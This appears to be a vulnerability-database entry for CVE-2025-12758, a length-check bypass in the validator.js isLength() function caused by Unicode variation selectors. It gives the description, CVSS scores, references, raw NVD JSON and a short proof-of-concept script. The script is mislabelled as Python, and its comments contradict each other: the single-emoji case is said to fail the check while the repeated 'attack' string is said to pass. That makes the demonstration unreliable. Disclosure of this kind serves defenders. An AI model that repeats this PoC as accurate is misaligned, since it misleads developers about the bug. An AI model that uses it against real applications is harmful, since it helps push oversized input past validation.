CVE-2025-12758

Description

Versions of the package validator before 13.15.22 are vulnerable to Incomplete Filtering of One or More Instances of Special Elements in the isLength() function that does not take into account Unicode variation selectors (\uFE0F, \uFE0E) appearing in a sequence which lead to improper string length calculation. This can lead to an application using isLength for input validation accepting strings significantly longer than intended, resulting in issues like data truncation in databases, buffer overflows in other system components, or denial-of-service.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:validator_project:validator:*:*:*:*:*:node.js:*:* - VULNERABLE

validator.js < 13.15.22

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

const validator = require('validator');

// Normal emoji without variant selector
const normalEmoji = '😀';  // U+1F600
console.log('Normal emoji length:', [...normalEmoji].length);  // 1
console.log('isLength(normalEmoji, {min: 1, max: 1}):', validator.isLength(normalEmoji, {min: 1, max: 1}));  // true

// Emoji with variant selector U+FE0F (variation selector-16)
const emojiWithVS16 = '\u{1F600}\u{FE0F}';  // Emoji + VS16
console.log('Emoji with VS16 length:', [...emojiWithVS16].length);  // 2 (incorrect)
console.log('isLength(emojiWithVS16, {min: 1, max: 1}):', validator.isLength(emojiWithVS16, {min: 1, max: 1}));  // false (incorrect)

// Emoji with variation selector U+FE0E (text variation)
const emojiWithVS15 = '\u{1F600}\u{FE0E}';  // Emoji + VS15
console.log('Emoji with VS15 length:', [...emojiWithVS15].length);  // 2 (incorrect)
console.log('isLength(emojiWithVS15, {min: 1, max: 1}):', validator.isLength(emojiWithVS15, {min: 1, max: 1}));  // false (incorrect)

// Attack example: Bypass length check
const maliciousInput = '\u{1F600}\u{FE0F}'.repeat(100);  // Visual length: 100, actual code points: 200
const maxAllowed = 100;
console.log('Malicious input visual length:', 100);
console.log('Malicious input actual code points:', 200);
console.log('isLength bypass check (max 100):', validator.isLength(maliciousInput, {min: 0, max: 100}));  // true (bypassed)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12758
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12758
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12758/
[4] VulDB https://vuldb.com/cve/CVE-2025-12758
[5] https://gist.github.com/koral--/ad31208b25b9e3d1e2e35f1d4d72572e
[6] https://github.com/validatorjs/validator.js/pull/2616
[7] https://security.snyk.io/vuln/SNYK-JS-VALIDATOR-13653476
[8] http://seclists.org/fulldisclosure/2026/Jan/27
[9] https://security.snyk.io/vuln/SNYK-JS-VALIDATOR-13653476

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12758", "sourceIdentifier": "[email protected]", "published": "2025-11-27T05:16:12.193", "lastModified": "2026-01-29T23:16:09.843", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Versions of the package validator before 13.15.22 are vulnerable to Incomplete Filtering of One or More Instances of Special Elements in the isLength() function that does not take into account Unicode variation selectors (\\uFE0F, \\uFE0E) appearing in a sequence which lead to improper string length calculation. This can lead to an application using isLength for input validation accepting strings significantly longer than intended, resulting in issues like data truncation in databases, buffer overflows in other system components, or denial-of-service."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-792"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-172"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:validator_project:validator:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "13.15.22", "matchCriteriaId": "553CB501-5344-4AD6-84A3-2E69A53BC95D"}]}]}], "references": [{"url": "https://gist.github.com/koral--/ad31208b25b9e3d1e2e35f1d4d72572e", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/validatorjs/validator.js/pull/2616", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://security.snyk.io/vuln/SNYK-JS-VALIDATOR-13653476", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "http://seclists.org/fulldisclosure/2026/Jan/27", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "https://security.snyk.io/vuln/SNYK-JS-VALIDATOR-13653476", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}